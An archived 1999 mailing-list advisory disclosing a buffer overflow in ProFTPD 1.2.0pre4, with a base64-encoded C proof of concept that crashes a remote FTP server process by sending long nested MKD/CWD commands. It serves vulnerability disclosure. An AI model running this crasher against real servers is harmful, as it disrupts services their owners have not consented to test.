This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---1463810815-1766910372-936723086=:3522 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, I have found out yet another buffer overflow in ProFTP 1.2.0pre4, which may or may not be exploitable. I have noticed the authors and other security related persons a week ago, and I still got no answer, in spite of my repost. So either they do not care, either my set up is badly done. Why it may not be easily exploited (or not at all) : because the segmentation fault is not done because of a changed return adress. The overflow will in fact change a pointer and make it point on somewhere else, and then FTPD will use strlen() on it. Anyway, maybe other variables may be changed, I have not looked at it carefully yet. How does the overflow works : this is a variation of the infamous and now-old wu-ftpd mkdir overflow (make a directory in another directory, in another directory, and so on), but this time, the name of the created directories must not exceed 255 chars. That's all. Attached to this message is a dumb program that will just make the remote proftpd crash. Have a look at /var/log/messages, and you'll see something as fun as : Sep 1 14:18:49 prof proftpd[5327]: ProFTPD terminating (signal 11) (quick note : the program will not check for error code, so make sure you have the right to create directories in the appropriate directory, or you'll get false positives/negatives). This is *not* a DoS attack, since only a ProFTPd child will die. I tested this flaw with proftpd 1.2.0pre4 as seen of ftp://ftp.tos.net/pub/proftpd. This problem was tested on a RedHat 6.0. Patch : use something else / another good reason to not have anonymous writeable directories. -- Renaud -- Renaud Deraison The Nessus Project http://www.nessus.org ---1463810815-1766910372-936723086=:3522 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="crash_ftpd.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.9909071851260.3522at_private> Content-Description: Be sure to edit this file before starting it Content-Disposition: attachment; filename="crash_ftpd.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCi8qDQogKiBDcmFzaGVzIFByb0ZU UGQgMS4yLjBwcmU0IGJlY2F1c2Ugb2YgYSBidWZmZXIgb3ZlcmZsb3cuDQog Kg0KICoNCiAqIFRoaXMgYnVnIHdhcyBkaXNjb3ZlcmVkIGJ5IHRoZSBOZXNz dXMgU2VjdXJpdHkgU2Nhbm5lcg0KICoNCiAqIEkgZG9uJ3Qga25vdyBpZiB0 aGlzIGZsYXcgY2FuIGJlIGV4cGxvaXRlZCB0byBnYWluDQogKiByb290IHBy aXZpbGVnZXMuDQogKg0KICoNCiAqIFRoZSBuYW1lIG9mIHRoZSBjcmVhdGVk IGRpcmVjdG9yeSBtdXN0IG5vdCBleGNlZWQgMjU1IGNoYXJzICENCiAqDQog Kg0KICogV3JpdHRlbiBieSBSZW5hdWQgRGVyYWlzb24gPGRlcmFpc29uQGN2 cy5uZXNzdXMub3JnPg0KICoNCiAqLw0KDQovKg0KICogQ2hhbmdlIHRoaXMg IQ0KICovDQojZGVmaW5lIFRBUkdFVCAiMTkyLjE2OC4xLjUiDQojZGVmaW5l IFdSSVRFQUJMRV9ESVIgIi9pbmNvbWluZyINCg0KaW50IG1haW4oKQ0Kew0K IHN0cnVjdCBpbl9hZGRyIHRhcmdldDsNCiBpbnQgc29jOw0KIHN0cnVjdCBz b2NrYWRkcl9pbiBzYTsNCiANCiBjaGFyICogd3JpdGVhYmxlX2RpciA9ICJD V0QgIldSSVRFQUJMRV9ESVIiXHJcbiI7DQogY2hhciAqIG1rZDsNCiBjaGFy ICogY3dkOw0KDQoNCiBpbmV0X2F0b24oVEFSR0VULCAmdGFyZ2V0KTsNCiBt a2QgPSBtYWxsb2MoMzAwKTsJYnplcm8obWtkLCAzMDApOw0KIGN3ZCA9IG1h bGxvYygzMDApOwliemVybyhjd2QsIDMwMCk7DQogDQogc29jID0gc29ja2V0 KFBGX0lORVQsIFNPQ0tfU1RSRUFNLDApOw0KIA0KIGJ6ZXJvKCZzYSwgc2l6 ZW9mKHNhKSk7DQogc2Euc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2Euc2lu X3BvcnQgICA9IGh0b25zKDIxKTsNCiBzYS5zaW5fYWRkci5zX2FkZHIgPSB0 YXJnZXQuc19hZGRyOw0KIGlmKCEoY29ubmVjdChzb2MsIChzdHJ1Y3Qgc29j a2FkZHIgKikmc2EsIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHJfaW4pKSkpDQog ew0KICBjaGFyICogYnVmID0gbWFsbG9jKDEwMjQpOw0KICBpbnQgaTsNCiAg c3ByaW50Zihta2QsICJNS0QgIik7DQogIG1lbXNldChta2QrNCwgJ1gnLCAy NTQpOw0KICBzcHJpbnRmKG1rZCwgIiVzXHJcbiIsIG1rZCk7DQogIA0KICBz cHJpbnRmKGN3ZCwgIkNXRCAiKTsNCiAgbWVtc2V0KGN3ZCs0LCAnWCcsIDI1 NCk7DQogIHNwcmludGYoY3dkLCAiJXNcclxuIiwgY3dkKTsNCiAgDQogIHJl Y3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBzZW5kKHNvYywgIlVTRVIgZnRw XHJcbiIsIHN0cmxlbigiVVNFUiBmdHBcclxuIiksMCk7DQogIHJlY3Yoc29j LCBidWYsIDEwMjQsIDApOw0KICBiemVybyhidWYsMTAyNCk7DQogIHNlbmQo c29jLCAiUEFTUyBqb2VAXHJcbiIsIHN0cmxlbigiUEFTUyBqb2VAXHJcbiIp LDApOw0KICByZWN2KHNvYywgYnVmLCAxMDI0LCAwKTsNCiAgYnplcm8oYnVm LCAxMDI0KTsNCiAgc2VuZChzb2MsIHdyaXRlYWJsZV9kaXIsIHN0cmxlbih3 cml0ZWFibGVfZGlyKSwgMCk7DQogIHJlY3Yoc29jLCBidWYsIDEwMjQsIDAp Ow0KICBiemVybyhidWYsMTAyNCk7DQogIA0KICANCiAgZm9yKGk9MDtpPDQw O2krKykNCiAgew0KICAgc2VuZChzb2MsIG1rZCwgc3RybGVuKG1rZCksIDAp Ow0KICAgcmVjdihzb2MsIGJ1ZiwgMTAyNCwwKTsNCiAgIGlmKCFzdHJsZW4o YnVmKSkNCiAgIHsNCiAgICBwcmludGYoIlJlbW90ZSBGVFBkIGNyYXNoZWQg KHNlZSAvdmFyL2xvZy9tZXNzYWdlcylcbiIpOw0KICAgIGV4aXQoMCk7DQog ICB9DQogICBiemVybyhidWYsIDEwMjQpOw0KICAgc2VuZChzb2MsIGN3ZCwg c3RybGVuKGN3ZCksIDApOw0KICAgcmVjdihzb2MsIGJ1ZiwgMTAyNCwwKTsN CiAgIGlmKCFzdHJsZW4oYnVmKSkNCiAgIHsNCiAgICBwcmludGYoIlJlbW90 ZSBGVFBkIGNyYXNoZWQgKHNlZSAvdmFyL2xvZy9tZXNzYWdlcylcbiIpOw0K ICAgIGV4aXQoMCk7DQogICB9DQogICBiemVybyhidWYsIDEwMjQpOw0KICB9 DQogIHByaW50ZigiWW91IHdlcmUgbm90IHZ1bG5lcmFibGUgYWZ0ZXIgYWxs LiBTb3JyeVxuIik7DQogIGNsb3NlKHNvYyk7DQogfQ0KIGVsc2UgcGVycm9y KCJjb25uZWN0ICIpOw0KIHJldHVybigwKTsNCn0NCiAgIA0KICANCg== ---1463810815-1766910372-936723086=:3522--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:26 PDT